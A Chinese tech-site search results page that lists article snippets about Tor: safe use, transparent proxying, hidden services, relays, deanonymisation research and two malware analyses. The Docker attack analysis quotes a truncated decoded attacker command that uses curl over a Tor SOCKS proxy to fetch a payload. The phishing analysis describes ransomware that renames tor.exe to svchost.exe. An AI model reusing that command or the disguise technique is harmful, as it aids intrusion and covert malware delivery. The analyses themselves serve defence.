首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏FreeBuf

    如何安全的使用Tor网络

    Tor是什么 Tor是互联网上用于保护您隐私最有力的工具之一,但是时至今日仍有许多人往往认为Tor是一个终端加密工具。事实上,Tor是用来匿名浏览网页和邮件发送(并非是邮件内容加密)的。 Tor的工作原理是这样的: 当你通过Tor发送邮件时, tor会使用一种称为“洋葱路由”的加密技术通过网络随机生成的过程传送邮件。这有点像在一叠信中放了一封密信。 如果它要一个直接连接到Tor网络的服务器上“Tor隐藏服务”,没有任何问题。但是,如果你只是使用Tor作为代理来访问你经常上的网络,就有点复杂。 Chloe曾报道Tor的半集中式系统清理监听节点并没有完全将问题解决,他们依旧窥探着! 如果您在使用Tor浏览网页,你发送的任何邮件都会很容易在您的出口节点窥探。 如何安全使用Tor 幸运的是,那些因为这种缘故而信息泄漏的国家导有一个基本的错误,即:他们误解了Tor是什么,是用来做什么的。 好消息是,你可以使用一些简单的技巧在使用Tor的时候保护您的隐私。

    3K100发布于 2018-02-06
  • 来自专栏Khan安全团队

    Tor 虚拟隧道网络 0.3.3.9

    Tor 0.3.3.9移至新的桥授权。 Tor是虚拟隧道网络,允许人员和团体改善Internet上的隐私和安全性。它还使软件开发人员能够创建具有内置隐私功能的新通信工具。 更改:Tor 0.3.3.9移至新的网桥授权,这意味着运行网桥中继的人员应进行升级。 下载: packetstormsecurity.com/files/download/148577/tor-0.3.3.9.tar.gz

    1.4K40发布于 2021-03-10
  • 来自专栏杂学

    通过TOR绕过IP锁定

    Tor通过将用户的通信流量经过多个中间节点(也称为中继)进行随机路由,使得追踪用户的来源和目的地变得困难。尽管Tor提供了一定程度的隐私和匿名性,但它并不完全免疫于攻击和安全威胁。 Tor网络可能受到流量分析、出口节点的恶意行为以及入口和中继节点的攻击影响。此外,Tor的性能也可能受到限制,导致较慢的网络连接速度。 虽然Tor提供了一定程度的隐私和保护,但它并非绝对安全,可能存在攻击和性能方面的局限性。Tor项目在不断改进和发展,以提供更强大的隐私保护解决方案。1.3. Tor电路的最长可使用时间,以秒为单位。 当一个电路的使用时间达到这个设定值后,Tor会关闭该电路并创建一个新的电路。NewCircuitPeriod:该配置项规定了Tor主动创建新电路的时间间隔,以秒为单位。

    1.2K10编辑于 2023-05-12
  • 来自专栏用户8644135的专栏

    洋葱路由Tor及其攻击

    Tor是洋葱路由The Onion Router的缩写,它是一个由上千个中继器组成的开放网络,用于隐藏用户的地址和网络使用信息。 Tor不是为了完全解决用户的匿名问题,而是为了解决目标网站反追踪用户信息的问题。 Onion services Tor并不仅仅可以将用户信息匿名,还可以隐藏网站服务。 Tor网络通过地址的公钥和一个分布式的Hash表来进行路由的定位工作。 攻击目标 Tor主要提供匿名网络访问,那么对其攻击的目标就是让用户不再匿名,即弄清楚到底是哪个用户访问了什么资源。 Tor 出口节点屏蔽 由于Tor的特殊匿名性,有些互联网站点可能会将Tor的出口节点进行屏蔽,禁止他们访问其服务。这样就会对Tor的应用进行限制。 通信确认攻击就是攻击者观察或者控制了一个Tor请求的出入节点,通过比较通信时间,流量或者其他特征向量来确认这两个节点在同一个Tor路径上,从而就能知道谁访问了谁。

    2.7K20发布于 2021-06-21
  • 来自专栏指剑的分享

    使用洋葱Tor进入Dark Web

    首先在google.com上面搜索tor browser 进入下载界面↓↓↓: 选择你所需要的版本: 下载并安装到你的电脑上 随便找个 “楼梯” 可以使用全局代理的那种 开启成功后,打开你之前安装的 Tor Browser 成功连接,打开Tor Borwser为如下界面 键入你找到的 Dark web 网站 这里提供一个明网的网站三W点b一sTG欧R一点抗 请自行重组上述网站 #####

    12.2K40编辑于 2023-09-21
  • 来自专栏FreeBuf

    匿名助手Tor-Router:Tor网关及流量配置工具使用全教程

    今天给大家介绍的是一款名叫Tor-Router的实用工具,这款工具可以帮助我们将Tor设置为默认网关,并将所有的网络流量通过Tor来发送,整个过程不需要用户手动编码,以帮助用户增强隐私性和匿名保护性。 Tor-Router Tor-Router允许用户将Tor用作透明代理,并通过Tor(包括DNS请求)来发送设备所有的网络流量。 用户只需要一台使用了systemd(如果你需要使用这个服务的话)和Tor的设备,即可享受Tor-Router带来的便捷。 /files 2.将下列代码行添加到/etc/tor/torrc文件的结尾: #Seting up TOR transparent proxy for tor-routerVirtualAddrNetwork10.192.0.0 工具卸载/服务终止 删除/etc/tor/torrc文件中的Tor-Router配置行,使用systemctl禁用tor-router服务,删除/usr/bin/tor-router和/etc/systemd

    3.6K30发布于 2019-08-01
  • 来自专栏FreeBuf

    基于Tor网络的钓鱼邮件分析

    install.sql会连接tor网络,然后加密受害者计算机的文件,弹出勒索信息。 攻击流程图: ? 三、word宏分析 如果允许宏运行,很遗憾,受害者的计算机很有可能会受到后续的一系列攻击。 2.下载Tor https://archive.torproject.org/tor-package-archive/torbrowser/7.0/tor-win32-0.3.0.7.zip 下载了tor 3.当下载完成后,解压,并将tor.exe重命名为svchost.exe,然后执行。 (tor原本被以隐藏方式执行,手动将其改为正常显示) 可以发现作者在程序中设置了tor代理,之后将通过tor发送网络请求 ? 虽说勒索病毒需要连接到tor网络,国内的小伙伴并不需要过分担心。但还是要提醒各位读者,不要随便点击来路不明的邮件附件,请使及时对计算机中的重要资料进行备份,防止不必要的损失。

    2.3K01发布于 2018-07-30
  • 来自专栏全栈程序员必看

    TOR架构_中国有多少大数据中心

    2、布线方式 ToR:(Top of Rack)接入方式就是在服务器机柜的最上面安装接入交换机。 TOR布线的缺点:每个服务器机柜受电源输出功率限制,可部署的服务器数量有限,由此导致机柜内交换机的接入端口利用率不足。 从网络设计考虑,TOR布线方式的每台接入交换机上的VLAN量不会很多,在网络规划的时候也要尽量避免使一个VLAN通过汇聚交换机跨多台接入交换机,因此采用TOR布线方式的网络拓扑中,每个VLAN的范围不会太大 TOR方式的接入交换机数量多,EOR方式的接入交换机数量少,所以TOR方式的网络设备管理维护工作量大 随着用户数据业务需求的猛增,数据中心机房服务器密度越来越高,虚拟化和云计算等新技术趋势日益流行 在这样的趋势下,显然ToR更加适用,在业务迅速扩展的压力下,ToR的方式可以更好的实现网络的更快速扩展。

    1.9K10编辑于 2022-09-20
  • 来自专栏FreeBuf

    树莓派打造洋葱Tor代理路由

    这时候,我们只需要从电脑连接到热点,就可以借助匿名的Tor在网上冲浪啦。 什么是Tor Tor是一种洋葱路由服务—每个网络包在到达你指定的目的地前,需要经过3层中继。 根据Tor官网所述: 记者借助Tor能更便捷地沟通告密者和持不同政见的人,非政府组织使用Tor能让自家员工在国外时也能访问自家主页。 企业可以采用Tor作为安全手段,防止竞争对手窃听采购方案。他们还用Tor来代替传统的V**,后者会泄露通信相关的敏感信息。 某美国海军分部使用了Tor进行开源情报收集,他们其中一个团队最近在中东地区部署的时候也使用了Tor。而对于执法部门,他们使用Tor去浏览网站的时候和信息刺探操作时,也不会因此泄露政府的IP。 安装洋葱路由Tor代理 下面的设置可以参考Tor“匿名代理教程”。 我们下面开始安装tor,也就是洋葱路由软件。

    3.8K60发布于 2018-02-09
  • 来自专栏终身幼稚园

    Python使用Tor作为代理进行网页抓取

    今天我们讲方法不是使用ip代理池, 而是通过Tor(洋葱路由)进行匿名访问目标地址 介绍 ---- 什么是Tor(洋葱路由) Tor(The Onion Router)是第二代洋葱路由(onion , 因为我的本地电脑为mac, 因此直接通过brew安装 brew install tor, 安装完成后启动Tor服务, brew services start tor 下载浏览器驱动, 因为我本地使用的 文件中的以下两行取消注释 ControlPort 9051 CookieAuthentication 1 重启Tor brew services restart tor 代码介绍 # 通过Tor 打印出代理后的ip Stem 是基于 Tor 的 Python 控制器库,可以使用 Tor 的控制协议来对 Tor 进程进行脚本处理或者构建。 Stem: 是基于 Tor 的 Python 控制器库,可以使用 Tor 的控制协议来对 Tor 进程进行脚本处理或者构建。

    8.2K20发布于 2020-05-18
  • 来自专栏Urlteam

    基于Tor匿名网络的多ip爬虫

    基于tor匿名网络的多ip爬虫.更换ip的方式有多种,其中tor这类型则适合ip更换次数不大,网页数据量也不大,但是又厌恶代理那天天失效的麻烦,则最简单快捷的便是使用tor在本机搭建一个出口端口 二.部署方式: .. 2.1 环境准备 ….. 2.1.1 Linux ….. 2.1.2 Python ….. 2.1.3 Tor ═══ ┌──── │ sudo apt-get install tor │ sudo /etc/init.d/tor restart └──── 启动后socks监听9050端口。 ┌──── │ tor –hash-password mypassword └──── 生成你的密码,之后编辑/etc/tor/torrc加上 ControlPort ┌──── │ /etc/init.d/tor restart └──── 重启下tor

    2.2K40发布于 2019-11-28
  • 来自专栏网络安全技术点滴分享

    揭露利用Tor网络的Docker漏洞攻击链

    关键发现新型攻击结合Docker远程API与Tor匿名网络,在受害系统隐秘部署加密货币挖矿程序攻击者利用配置不当的Docker API获取容器环境访问权限,通过Tor隐藏活动痕迹主要攻击目标为云计算密集型行业 IP: 198.199.72.27),随后攻击者创建挂载宿主机根目录的Alpine容器,通过base64编码隐藏恶意命令:# 解码后的攻击命令sh -c curl --socks5-hostname tor 配置允许root登录植入攻击者公钥实现持久化访问工具安装部署masscan端口扫描工具安装zstd压缩工具和torsocks代理工具C2通信通过.onion域名向攻击者C2服务器回传系统信息有效载荷投递通过Tor 初始访问 利用公开应用漏洞 T1190 防御规避 文件混淆(Zstd压缩) T1027.015 命令与控制 多跳代理(Tor

    26710编辑于 2025-07-26
  • 来自专栏VNF

    在Ubuntu使用TOR遇到Vidalia detected that the tor software exited unexpectedly解决方案 By HKL, Saturday 27 July

    大概是因为你在Ubuntu或者Debian时遇到Vidalia detected that the tor software exited unexpectedly吧。而且英文不太好。 Vidalia detected that the tor software exited unexpectedly. 在终端机用以下命令关闭TOR : sudo killall tor 第一步: 在终端机输入以下命令 : sudo gedit /etc/tor/torrc 接着会在53至60行会出现下面的东西: ## The port on which Tor will listen for local connections from Tor ## controller applications, as documented 并重启TOR : sudo /etc/init.d/tor restart 完成了 打开Vidalia干你想干的事吧.

    68630发布于 2020-07-22
  • 来自专栏FreeBuf

    如何使用ipChecker判断给定IP是否是Tor或开放代理

     关于ipChecker  ipChecker是一款功能强大的IP地址检测工具,该工具可以帮助广大研究人员判断一个给定的IP地址是否是一个Tor节点或是一个恶意开放代理。   当我们运行make run命令时,它将启动docker swarm来为API创建一个服务,该服务可以升级并被四个容器使用,另一个服务专门用来更新脚本程序并捕捉所有的代理和Tor节点中所有的插件,最后一个服务时一个容器 为了避免误报,API只会返回当前日期的IP,因为几乎所有的代理服务器或Tor节点使用的都是动态IP。  

    1.2K40编辑于 2023-05-19
  • 来自专栏解决方案服务

    深入解析Tor网络:匿名上网的秘密通道

    所以Tor网络具体是怎样运作的呢: Tor网络,也被称为洋葱路由器(The Onion Router),是一个由志愿者运营的匿名通信网络。 此外,Tor网络还使用了动态的中继节点,使得每一次用户请求都经过不同的节点,增强了匿名性。 Tor网络举例:在某些国家被互联网审查的情况下,用户可以使用Tor网络来访问被屏蔽的网站和内容。 在他们需要向公众和媒体公开敏感信息或揭露不法行为时,使用Tor网络能够增强其匿名性,防止被追踪和报复。Tor网络被广泛应用于黑暗网络。 相关新闻事件:2013年,**联邦调查局(FB*)成功关闭了一个运营在Tor网络上的黑暗网市场“丝绸之路”。这个事件引发了对Tor网络安全性和其支持匿名通信的争议。 在某些国家,政府和执法机构试图限制和打击Tor网络的使用,认为其为犯罪活动提供了便利。然而,Tor网络仍然被无数用户用于维护隐私和自由上网的需求。

    2.9K40编辑于 2023-10-23
  • 来自专栏HACK学习

    如何创建一个 Tor.onion 网站

    不要在这台服务器上运行 Tor 中继,因为 Tor 中继在真实世界的公开 IP 是公开的。 不要从这台服务器发送电子邮件。 不要运行讨厌的或卑鄙的 Web 软件。 本文使用 Debian Wheezy , Nginx , Tor 提供 Web 服务。Nginx 将被配置为只监听 Tor,只可通过 Tor 访问。 按照 torproject.org 文档添加 Debian repo 在这里 配置Tor服务 确保下面几行配置正确 启动(或重启) Tor 服务 当 Tor 启动时,它会在你的 HiddenServiceDir root@debian:~# cd /var/lib/tor/hidden_service/root@debian:/var/lib/tor/hidden_service# lshostname private_keyroot @debian:/var/lib/tor/hidden_service# cat private_key root@debian:/var/lib/tor/hidden_service# cat hostnamejuyy62wplbkk7gzy.onionroot

    3.4K21发布于 2019-08-07
  • 来自专栏林德熙的博客

    贡献自己的服务器搭建tor中转

    本文告诉大家如何贡献自己的服务器来搭建 tor 中转,支持 tor。本文使用的服务器是 Centos 6 ,如果你的服务器不是 Centos 6 就不要看啦。 1.下载并安装Tor 安装tor: yum install tor -y 2.编译安装obfs4 安装所需软件: yum install git mercurial golang -y 开始安装obfs4proxy 然后编辑/etc/tor/torrc,定义一个ORPort,不作为出口节点,设置成Bridge,请把中文删除 Log notice file /var/log/tor/notices.log 设置日志的位置 服务: service tor restart 4.使用网桥 查看日志文件tail -n 100 -F /var/log/tor/notices.log,当看到有类似的输出,证明很成功: [notice ] Tor has successfully opened a circuit.

    4.5K20发布于 2019-03-13
  • 来自专栏网络安全

    德国执法部门揭秘:Tor用户匿名神话破灭

    “和你们中的许多人一样,我们留下的问题仍然多于答案——但有一点很清楚:Tor 用户可以继续使用 Tor 浏览器安全匿名地访问网络。 而且 Tor 网络很健康,“Tor 项目团队在一篇博文中说。 “对于全球绝大多数需要在浏览互联网时保护自己隐私的用户来说,Tor 仍然是他们最好的解决方案。” 8 月,德国警方突袭了一个与 Tor 相关的名为 Article 5 eV 的群组,以发现 Tor 网络用户。该非营利组织运营着 Tor 网络的一些出口节点。 Tor 项目向其用户询问更多信息 目前,Tor 项目鼓励用户保持软件的最新版本。 “Tor 项目中继的多样性是 Tor 社区面临的一个紧迫问题。”

    52110编辑于 2024-10-02
  • 来自专栏安恒信息

    NSA能破解大部分Tor加密密钥

    全研究人员认为,Tor匿名网络使用的大部分密钥能被美国国家安全局(NSA)破解。 根据Tor的统计,只有10%的Tor服务器使用2.4版本,Tor 2.4实现了椭圆曲线Diffie-Hellman加密,更难破解。

    1.5K31发布于 2018-04-09
  • 来自专栏FreeBuf

    一种被动的Tor网络去匿名化方法

    目前针对Tor的攻击检测方法都是采用主动攻击,本文将介绍一种被动攻击的去匿名化方法。 一、当前Tor网络检测方法 当前对Tor网络的攻击检测一般有以下几种方法: 1.控制出口节点,篡改未加密流量。 在一些限制使用Tor上网的地方用户会使用私有的网桥跳转到Tor网络中,这些网桥不被公开所以没法限制。攻击者也可以通过运行一个中继节点专门收集不是公共入口节点的网桥地址。 第一,少数节点难以被Tor客户端随机选中,第二,Tor项目对所有 Tor节点通过在线情况进行投票标识flag(包括Stable、Valid、Exit、BadExit、Valid、Fast等),只有稳定节点被选取的机会大 因此对Tor网络的主动攻击还是很困难的,以下介绍一种被动的Tor网络检测方法,主要针对服务器端的去匿名化。 5.避免在Tor中继节点上托管暗网服务。Tor节点的正常运行时序、IP地址等信息都是公开的,可以一一验证。

    2.5K90发布于 2018-02-09
领券